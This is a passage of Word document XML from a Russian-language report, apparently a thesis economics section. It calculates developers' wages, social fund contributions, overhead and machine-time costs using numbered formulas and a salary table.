        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C23E72" w:rsidRPr="0021747F" w:rsidRDefault="00C23E72" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve">где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oMath>
      <w:r w:rsidRPr="0021747F">
        <w:t>– заработная плата исполнителей (руб.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23E72" w:rsidRPr="0021747F" w:rsidRDefault="00AF064D" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          </w:rPr>
          <m:t>Т</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> – трудоёмкость разработки (чел</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72">
        <w:t>овеко-</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t xml:space="preserve">дни); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23E72" w:rsidRDefault="00F870DF" w:rsidP="00AF064D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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oMath>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> – средняя дневная тарифная ставка работника организации разработчика проекта(руб./чел</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72">
        <w:t>овеко-</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t>дни), которая определяется по формуле</w:t>
      </w:r>
      <w:r w:rsidR="00AF064D">
        <w:t xml:space="preserve"> 12</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t>:</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F064D" w:rsidTr="00A95645">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00F870DF" w:rsidP="00A95645">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="both"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00AF064D" w:rsidRDefault="00AF064D" w:rsidP="00A95645">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C23E72" w:rsidRPr="0021747F" w:rsidRDefault="00C23E72" w:rsidP="00A95645">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve">где </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          </w:rPr>
          <m:t>C</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> – месячная зарплата работника (руб./мес.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23E72" w:rsidRDefault="00F870DF" w:rsidP="00A95645">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>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oMath>
      <w:r w:rsidR="00A95645">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t>– среднее количество рабочих дней в месяце (20</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C23E72" w:rsidRPr="0021747F">
        <w:t>дн</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72">
        <w:t>ей).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C23E72" w:rsidRDefault="00C23E72" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="00997D8B">
        <w:t xml:space="preserve">Дополнительная заработная плата на период разработки </w:t>
      </w:r>
      <w:r w:rsidR="00A95645">
        <w:t>вычисляется по формуле 13</w:t>
      </w:r>
      <w:r w:rsidRPr="00997D8B">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A95645" w:rsidTr="00A95645">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00A95645" w:rsidRDefault="00F870DF" w:rsidP="00A95645">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>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A95645">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A95645" w:rsidRDefault="00A95645" w:rsidP="00A95645">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(13)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00DC4AB9" w:rsidRPr="003843B4" w:rsidRDefault="00C23E72" w:rsidP="00DC4AB9">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="0021747F">
        <w:t>Расчёт затрат на основную заработную плату разработчи</w:t>
      </w:r>
      <w:r w:rsidR="003843B4">
        <w:t>ков проек</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>та приведен в таблице 19</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC4AB9" w:rsidRDefault="00C23E72" w:rsidP="003843B4">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="0021747F">
        <w:t xml:space="preserve"> – Затраты на заработную плату.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10132"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085896">
        <w:trPr>
          <w:trHeight w:val="688"/>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Время работы (рабоч.дн.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420"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DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">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DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">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Общая величина заработной платы (руб.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C23E72" w:rsidRPr="00916E11" w:rsidTr="00085896">
        <w:trPr>
          <w:trHeight w:val="121"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1631" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>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Руководитель проекта</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290"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63000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1176"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3000</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34.05</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DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">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15322.5</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117473</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00085896" w:rsidRPr="00916E11" w:rsidTr="00085896">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10132" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00085896" w:rsidRPr="00085896" w:rsidRDefault="00085896" w:rsidP="00085896">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
              <w:spacing w:before="0"/>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4AB9" w:rsidRPr="00916E11" w:rsidTr="00186CA9">
        <w:trPr>
          <w:trHeight w:val="425"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10132" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="00916E11" w:rsidRDefault="00DC4AB9" w:rsidP="00DC4AB9">
            <w:pPr>
              <w:pStyle w:val="aff0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Продолжение таблица 19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DC4AB9" w:rsidRPr="00916E11" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:trHeight w:val="708"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1631"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Исполнители</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1290"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Месячная оплата труда (руб./мес.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1176"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Дневная оплата труда (руб./дн.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1336"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Время работы (рабоч.дн.)</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DC4AB9" w:rsidRPr="006657C4" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Основная заработная плата(руб.)</w:t>
            </w:r>
            <w:r w:rsidRPr="00916E11">
              <w:rPr>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t> </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DC4AB9" w:rsidRPr="006657C4" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Дополнительная заработная плата(руб.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1368" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="00000A"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="00000A"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="00000A"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00DC4AB9" w:rsidRPr="00916E11" w:rsidRDefault="00DC4AB9" w:rsidP="00C62C5A">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">
              <w:t>Общая величина заработной платы (руб.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C23E72" w:rsidRPr="00916E11" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:trHeight w:val="405"/>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56.85</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420"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DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r w:rsidRPr="00916E11">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138927</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C23E72" w:rsidRPr="00916E11" w:rsidTr="00DC4AB9">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4097" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="00000A"/>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Итого</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90.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1420"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222956</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1911"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33443.4</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256400</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003843B4" w:rsidRPr="00916E11" w:rsidTr="00C90951">
        <w:trPr>
          <w:trHeight w:val="324"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10132" w:type="dxa"/>
            <w:gridSpan w:val="7"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="003843B4" w:rsidRPr="00916E11" w:rsidRDefault="003843B4" w:rsidP="00DE6727">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C23E72" w:rsidRDefault="00C23E72" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w: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Default="00893F67" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Согласно формуле 14</w:t>
      </w:r>
      <w:r w:rsidR="00C23E72">
        <w:t>, затраты на внебюджетные фонды составляют:</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893F67">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00F870DF" w:rsidP="00893F67">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="284"/>
              <w:jc w:val="right"/>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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00893F67" w:rsidP="00893F67">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C23E72" w:rsidRPr="0021747F" w:rsidRDefault="00C23E72" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc61505572"/>
      <w:r>
        <w:t>Расчет накладных расходов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="00042E55" w:rsidRDefault="00C23E72" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>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893F67">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="00042E55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C23E72">
        <w:t>расчёта</w:t>
      </w:r>
      <w:r w:rsidR="00042E55">
        <w:t xml:space="preserve"> представлена ниже</w:t>
      </w:r>
      <w:r w:rsidRPr="00C23E72">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00042E55" w:rsidRPr="00042E55">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4B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00F870DF" w:rsidP="00893F67">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893F67">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00893F67" w:rsidP="00893F67">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00042E55" w:rsidRPr="00FE3DA9" w:rsidRDefault="00042E55" w:rsidP="00893F67">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE3DA9">
        <w:t xml:space="preserve">где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oMath>
      <w:r w:rsidRPr="00FE3DA9">
        <w:t>– накладные расходы (руб.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042E55" w:rsidRPr="00FE3DA9" w:rsidRDefault="00F870DF" w:rsidP="00893F67">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oMath>
      <w:r w:rsidR="00042E55" w:rsidRPr="00FE3DA9">
        <w:t xml:space="preserve"> – основная заработная плата исполнителей (руб.);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042E55" w:rsidRDefault="00893F67" w:rsidP="00893F67">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
          </w:rPr>
          <m:t>К</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00042E55" w:rsidRPr="00FE3DA9">
        <w:t xml:space="preserve"> – коэффициент учёта накладных расходов (К</w:t>
      </w:r>
      <w:r w:rsidR="00042E55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042E55" w:rsidRPr="00FE3DA9">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="00042E55">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00042E55" w:rsidRPr="00FE3DA9">
        <w:t>0,6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042E55" w:rsidRDefault="00042E55" w:rsidP="00893F67">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Итак, в нашем случае:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9344"/>
      </w:tblGrid>
      <w:tr w:rsidR="00893F67" w:rsidTr="004B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00F870DF" w:rsidP="00893F67">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="708"/>
              <w:jc w:val="cente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m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00042E55" w:rsidRDefault="00042E55" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc61505573"/>
      <w:r w:rsidRPr="00042E55">
        <w:t>Расчёт стоимости машинного времени</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00E369AE" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="002F0D96">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t>.</w:t>
      </w:r>
      <w:r w:rsidR="00893F67">
        <w:t xml:space="preserve"> Рассчитывается по формуле 16</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0D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893F67" w:rsidTr="004B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9067" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00F870DF" w:rsidP="00893F67">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893F67" w:rsidRPr="002F0D96">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="277" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00893F67" w:rsidRDefault="00893F67" w:rsidP="00893F67">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004B218D" w:rsidRDefault="00893F67" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidR="00E369AE" w:rsidRPr="002F0D96">
        <w:t>де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стоимость одного часа машинного времени. Допустим, что в данной ситуации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w:t>
      </w:r>
      <w:r w:rsidR="00E369AE">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E369AE" w:rsidRPr="002F0D96">
        <w:t xml:space="preserve"> руб/час;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00F870DF" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>З</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>м.вр</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidR="00E369AE" w:rsidRPr="002F0D96">
        <w:t xml:space="preserve"> – машинное время, которое необходимо для создания проекта.</w:t>
      </w:r>
      <w:r w:rsidR="004B218D">
        <w:t xml:space="preserve"> Оно рассчитывается по формуле 17.</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8926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF" w:rsidP="004B218D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="72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4B218D" w:rsidRPr="002F0D96">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="418" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="004B218D" w:rsidP="004B218D">
            <w:pPr>
              <w:pStyle w:val="14"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:t>(17)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E369AE" w:rsidRPr="002F0D96" w:rsidRDefault="004B218D" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:i/>
        </w:rPr>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р</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
      </m:oMath>
      <w:r w:rsidR="00E369AE" w:rsidRPr="002F0D96">
        <w:t xml:space="preserve"> – продолжительность рабочей смены</w:t>
      </w:r>
      <w:r w:rsidR="00E369AE">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <m:oMath>
        <m:sSub>
          <m:sSubPr>
            <m:ctrlPr>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
              </w:rPr>
            </m:ctrlPr>
          </m:sSubPr>
          <m:e>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>T</m:t>
            </m:r>
          </m:e>
          <m:sub>
            <m:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              </w:rPr>
              <m:t>р</m:t>
            </m:r>
          </m:sub>
        </m:sSub>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>=</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="00E369AE">
        <w:t xml:space="preserve"> 8 часов – длительность рабочего дня)</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00F870DF" w:rsidP="004B218D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pP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rsidR="00E369AE" w:rsidRPr="002F0D96">
        <w:t xml:space="preserve"> – это средний коэффициент и</w:t>
      </w:r>
      <w:r w:rsidR="00E369AE">
        <w:t>спользования машинного времени.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRPr="002F0D96" w:rsidRDefault="00E369AE" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="002F0D96">
        <w:t xml:space="preserve">Большая часть проекта непосредственно связана с работой за компьютером (работа с документацией в </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0D96">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Word</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0D96">
        <w:t xml:space="preserve"> и разработка), поэтому </w:t>
      </w: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t xml:space="preserve"> возьмем равной за 0,9</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0D96">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00E369AE" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="002F0D96">
        <w:t>Получим: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B218D" w:rsidTr="004B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF" w:rsidP="00DE45F9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="720"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <m:oMathPara>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*8*0,9= 654,48 м.час .</m:t>
                </m:r>
              </m:oMath>
            </m:oMathPara>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B218D" w:rsidTr="004B218D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9344" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004B218D" w:rsidRDefault="00F870DF"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tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E369AE" w:rsidRDefault="00E369AE" w:rsidP="001354A0">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r w:rsidRPr="002F0D96">
        <w:t>В результате расчетов можно вычислить итоговую себестоимость анализа проекта с учетом внедрения утилиты, которая</w:t>
